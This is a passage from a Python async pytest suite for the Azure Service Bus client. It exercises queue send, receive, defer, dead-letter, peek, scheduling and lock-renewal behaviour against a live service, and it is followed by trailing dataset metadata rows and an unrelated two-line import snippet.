BatchMessage,
DeferredMessage,
AutoLockRenew)
from azure.servicebus.common.message import PeekMessage
from azure.servicebus.common.constants import ReceiveSettleMode
from azure.servicebus.common.errors import (
ServiceBusError,
MessageLockExpired,
InvalidHandlerState,
MessageAlreadySettled,
AutoLockRenewTimeout,
MessageSendFailed,
MessageSettleFailed)
def get_logger(level):
azure_logger = logging.getLogger("azure")
if not azure_logger.handlers:
azure_logger.setLevel(level)
handler = logging.StreamHandler(stream=sys.stdout)
handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))
azure_logger.addHandler(handler)
uamqp_logger = logging.getLogger("uamqp")
if not uamqp_logger.handlers:
uamqp_logger.setLevel(logging.INFO)
uamqp_logger.addHandler(handler)
return azure_logger
_logger = get_logger(logging.DEBUG)
def print_message(message):
_logger.info("Receiving: {}".format(message))
_logger.debug("Time to live: {}".format(message.time_to_live))
_logger.debug("Sequence number: {}".format(message.sequence_number))
_logger.debug("Enqueue Sequence number: {}".format(message.enqueue_sequence_number))
_logger.debug("Partition ID: {}".format(message.partition_id))
_logger.debug("Partition Key: {}".format(message.partition_key))
_logger.debug("User Properties: {}".format(message.user_properties))
_logger.debug("Annotations: {}".format(message.annotations))
_logger.debug("Delivery count: {}".format(message.header.delivery_count))
try:
_logger.debug("Locked until: {}".format(message.locked_until))
_logger.debug("Lock Token: {}".format(message.lock_token))
except TypeError:
pass
_logger.debug("Enqueued time: {}".format(message.enqueued_time))
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_peeklock(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
queue_client.get_properties()
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
await sender.send(message)
with pytest.raises(ValueError):
queue_client.get_receiver(session="test", idle_timeout=5)
receiver = queue_client.get_receiver(idle_timeout=5)
count = 0
async for message in receiver:
print_message(message)
count += 1
await message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_receiveanddelete(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
queue_client.get_properties()
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
await sender.send(message)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
async for message in receiver:
messages.append(message)
with pytest.raises(MessageAlreadySettled):
await message.complete()
assert not receiver.running
assert len(messages) == 10
time.sleep(30)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
async for message in receiver:
messages.append(message)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_with_stop(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Stop message no. {}".format(i))
await sender.send(message)
messages = []
receiver = queue_client.get_receiver(idle_timeout=5)
async for message in receiver:
messages.append(message)
await message.complete()
if len(messages) >= 5:
break
assert receiver.running
assert len(messages) == 5
async with receiver:
async for message in receiver:
messages.append(message)
await message.complete()
if len(messages) >= 5:
break
assert not receiver.running
assert len(messages) == 6
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_simple(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Iter message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
print_message(message)
await message.complete()
with pytest.raises(MessageAlreadySettled):
await message.complete()
with pytest.raises(MessageAlreadySettled):
await message.renew_lock()
count += 1
with pytest.raises(InvalidHandlerState):
await receiver.__anext__()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_conn_str_client_iter_messages_with_abandon(live_servicebus_config, standard_queue):
client = ServiceBusClient.from_connection_string(live_servicebus_config['conn_str'], debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Abandoned message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
print_message(message)
if not message.header.delivery_count:
count += 1
await message.abandon()
else:
assert message.header.delivery_count == 1
await message.complete()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_defer(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_client(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
deferred = await queue_client.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.PeekLock)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(ValueError):
await message.complete()
with pytest.raises(ValueError):
await queue_client.settle_deferred_messages('foo', deferred)
await queue_client.settle_deferred_messages('completed', deferred)
with pytest.raises(ServiceBusError):
await queue_client.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = await queue_client.send(messages)
assert all(result[0] for result in results)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5) as session:
deferred = await session.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
assert message.lock_token
assert message.locked_until
assert message._receiver
await message.renew_lock()
await message.complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = await queue_client.send(messages)
assert all(result[0] for result in results)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5) as session:
deferred = await session.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
await message.dead_letter("something")
count = 0
async with queue_client.get_deadletter_receiver(idle_timeout=5) as receiver:
async for message in receiver:
count += 1
print_message(message)
assert message.user_properties[b'DeadLetterReason'] == b'something'
assert message.user_properties[b'DeadLetterErrorDescription'] == b'something'
await message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = await queue_client.send(messages)
assert all(result[0] for result in results)
count = 0
receiver = queue_client.get_receiver(idle_timeout=5)
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5) as receiver:
deferred = await receiver.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.ReceiveAndDelete)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(MessageAlreadySettled):
await message.complete()
with pytest.raises(ServiceBusError):
deferred = await receiver.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_not_found(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(3):
message = Message("Deferred message no. {}".format(i))
await sender.send(message)
count = 0
async for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
await message.defer()
assert count == 3
with pytest.raises(ServiceBusError):
deferred = await queue_client.receive_deferred_messages([3, 4], mode=ReceiveSettleMode.PeekLock)
with pytest.raises(ServiceBusError):
deferred = await queue_client.receive_deferred_messages([5, 6, 7], mode=ReceiveSettleMode.PeekLock)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_receive_batch_with_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
await sender.send(message)
count = 0
messages = await receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
count += 1
await message.dead_letter(description="Testing")
messages = await receiver.fetch_next()
assert count == 10
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_receive_batch_with_retrieve_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
await sender.send(message)
count = 0
messages = await receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
await message.dead_letter(description="Testing queue deadletter")
count += 1
messages = await receiver.fetch_next()
with pytest.raises(InvalidHandlerState):
await receiver.fetch_next()
assert count == 10
async with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 10
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_session_fail(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
with pytest.raises(ValueError):
queue_client.get_receiver(session="test")
async with queue_client.get_sender(session="test") as sender:
await sender.send(Message("test session sender"))
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_browse_messages_client(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
await sender.send(message)
messages = await queue_client.peek(5)
assert len(messages) == 5
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_browse_messages_with_receiver(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
async with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
await sender.send(message)
messages = await receiver.peek(5)
assert len(messages) > 0
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_browse_empty_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
messages = await receiver.peek(10)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_renew_message_locks(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
messages = []
locks = 3
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async with queue_client.get_sender() as sender:
for i in range(locks):
message = Message("Test message no. {}".format(i))
await sender.send(message)
messages.extend(await receiver.fetch_next())
recv = True
while recv:
recv = await receiver.fetch_next()
messages.extend(recv)
try:
assert not message.expired
for m in messages:
time.sleep(5)
initial_expiry = m.locked_until
await m.renew_lock()
assert (m.locked_until - initial_expiry) >= timedelta(seconds=5)
finally:
await messages[0].complete()
await messages[1].complete()
time.sleep(30)
with pytest.raises(MessageLockExpired):
await messages[2].complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_queue_client_conn_str_receive_handler_with_autolockrenew(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=True)
async with queue_client.get_sender() as sender:
for i in range(10):
message = Message("{}".format(i))
await sender.send(message)
renewer = AutoLockRenew()
messages = []
async with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
async for message in receiver:
if not messages:
messages.append(message)
assert not message.expired
renewer.register(message, timeout=60)
print("Registered lock renew thread", message.locked_until, datetime.now())
await asyncio.sleep(50)
print("Finished first sleep", message.locked_until)
assert not message.expired
await asyncio.sleep(25)
print("Finished second sleep", message.locked_until, datetime.now())
assert message.expired
try:
await message.complete()
raise AssertionError("Didn't raise MessageLockExpired")
except MessageLockExpired as e:
assert isinstance(e.inner_exception, AutoLockRenewTimeout)
else:
if message.expired:
print("Remaining messages", message.locked_until, datetime.now())
assert message.expired
with pytest.raises(MessageLockExpired):
await message.complete()
else:
assert message.header.delivery_count >= 1
print("Remaining messages", message.locked_until, datetime.now())
messages.append(message)
await message.complete()
await renewer.shutdown()
assert len(messages) == 11
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_fail_send_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
try:
queue_client = client.get_queue(standard_queue)
except MessageSendFailed:
pytest.skip("Open issue for uAMQP on OSX")
too_large = "A" * 1024 * 512
results = await queue_client.send(Message(too_large))
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
async with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
await sender.send(Message(too_large))
async with queue_client.get_sender() as sender:
sender.queue_message(Message(too_large))
results = await sender.send_pending_messages()
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_by_servicebus_client_fail_send_batch_messages(live_servicebus_config, standard_queue):
pytest.skip("TODO: Pending bugfix in uAMQP")
def batch_data():
for i in range(3):
yield str(i) * 1024 * 256
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
results = await queue_client.send(BatchMessage(batch_data()))
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
async with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
await sender.send(BatchMessage(batch_data()))
async with queue_client.get_sender() as sender:
sender.queue_message(BatchMessage(batch_data()))
results = await sender.send_pending_messages()
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_time_to_live(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.time_to_live = timedelta(seconds=30)
await sender.send(message)
time.sleep(30)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert not messages
async with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
async for message in receiver:
print_message(message)
await message.complete()
count += 1
assert count == 1
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_duplicate_detection(live_servicebus_config, duplicate_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
message_id = uuid.uuid4()
queue_client = client.get_queue(duplicate_queue)
async with queue_client.get_sender() as sender:
for i in range(5):
message = Message(str(i))
message.properties.message_id = message_id
await sender.send(message)
async with queue_client.get_receiver(idle_timeout=5) as receiver:
count = 0
async for message in receiver:
print_message(message)
assert message.properties.message_id == message_id
await message.complete()
count += 1
assert count == 1
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_connection_closed(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
with pytest.raises(MessageSettleFailed):
await messages[0].complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_expiry(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(30)
assert messages[0].expired
with pytest.raises(MessageLockExpired):
await messages[0].complete()
with pytest.raises(MessageLockExpired):
await messages[0].renew_lock()
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=30)
assert len(messages) == 1
print_message(messages[0])
assert messages[0].header.delivery_count > 0
await messages[0].complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_lock_renew(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(15)
await messages[0].renew_lock()
time.sleep(15)
await messages[0].renew_lock()
time.sleep(15)
assert not messages[0].expired
await messages[0].complete()
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_receive_and_delete(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
message = Message("Receive and delete test")
await sender.send(message)
async with queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete) as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
received = messages[0]
print_message(received)
with pytest.raises(MessageAlreadySettled):
await received.complete()
with pytest.raises(MessageAlreadySettled):
await received.abandon()
with pytest.raises(MessageAlreadySettled):
await received.defer()
with pytest.raises(MessageAlreadySettled):
await received.dead_letter()
with pytest.raises(MessageAlreadySettled):
await received.renew_lock()
time.sleep(30)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
for m in messages:
print_message(m)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_batch(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
def message_content():
for i in range(5):
yield "Message no. {}".format(i)
async with queue_client.get_sender() as sender:
message = BatchMessage(message_content())
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
recv = True
while recv:
recv = await receiver.fetch_next(timeout=10)
messages.extend(recv)
assert len(messages) == 5
for m in messages:
print_message(m)
await m.complete()
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_schedule_message(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.now() + timedelta(minutes=2)).replace(microsecond=0)
async with queue_client.get_receiver() as receiver:
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.properties.message_id = message_id
message.schedule(enqueue_time)
await sender.send(message)
messages = await receiver.fetch_next(timeout=120)
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id == message_id
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 1
finally:
for m in messages:
await m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_schedule_multiple_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.now() + timedelta(minutes=2)).replace(microsecond=0)
messages = []
async with queue_client.get_receiver(prefetch=20) as receiver:
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id_a = uuid.uuid4()
message_a = Message(content)
message_a.properties.message_id = message_id_a
message_id_b = uuid.uuid4()
message_b = Message(content)
message_b.properties.message_id = message_id_b
tokens = await sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
recv = await receiver.fetch_next(timeout=120)
messages.extend(recv)
recv = await receiver.fetch_next(timeout=5)
messages.extend(recv)
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id in (message_id_a, message_id_b)
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 2
finally:
for m in messages:
await m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_cancel_scheduled_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.now() + timedelta(minutes=2)).replace(microsecond=0)
async with queue_client.get_receiver() as receiver:
async with queue_client.get_sender() as sender:
message_a = Message("Test scheduled message")
message_b = Message("Test scheduled message")
tokens = await sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
await sender.cancel_scheduled_messages(*tokens)
messages = await receiver.fetch_next(timeout=120)
assert len(messages) == 0
| 39.530806
| 145
| 0.686752
| 4,852
| 41,705
| 5.639324
| 0.054411
| 0.058695
| 0.083327
| 0.04678
| 0.845662
| 0.8298
| 0.797201
| 0.765514
| 0.749287
| 0.739566
| 0
| 0.010063
| 0.225632
| 41,705
| 1,054
| 146
| 39.568311
| 0.837188
| 0.007145
| 0
| 0.778271
| 0
| 0
| 0.044297
| 0.000628
| 0
| 0
| 0
| 0
| 0.105322
| 1
| 0.004435
| false
| 0.001109
| 0.019956
| 0
| 0.025499
| 0.033259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f9152b584be2f7d121426c0104a226ca6fa1050
| 72
|
py
|
Python
|
tse_dataloader/__init__.py
|
aliik7/tse_dataloader
|
3085b65a7d9f4f47d0d21ad2857f9e562f0d7b95
|
[
"MIT"
] | 1
|
2021-02-25T09:53:16.000Z
|
2021-02-25T09:53:16.000Z
|
tse_dataloader/__init__.py
|
aliik7/tse_dataloader
|
3085b65a7d9f4f47d0d21ad2857f9e562f0d7b95
|
[
"MIT"
] | null | null | null |
tse_dataloader/__init__.py
|
aliik7/tse_dataloader
|
3085b65a7d9f4f47d0d21ad2857f9e562f0d7b95
|
[
"MIT"
] | 1
|
2021-01-22T21:24:34.000Z
|
2021-01-22T21:24:34.000Z
|
from tse_dataloader import download
from tse_dataloader import analysis
| 36
| 36
| 0.888889
| 10
| 72
| 6.2
| 0.6
| 0.225806
| 0.548387
| 0.741935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 72
| 2
| 37
| 36
| 0.96875
| 0
| 0
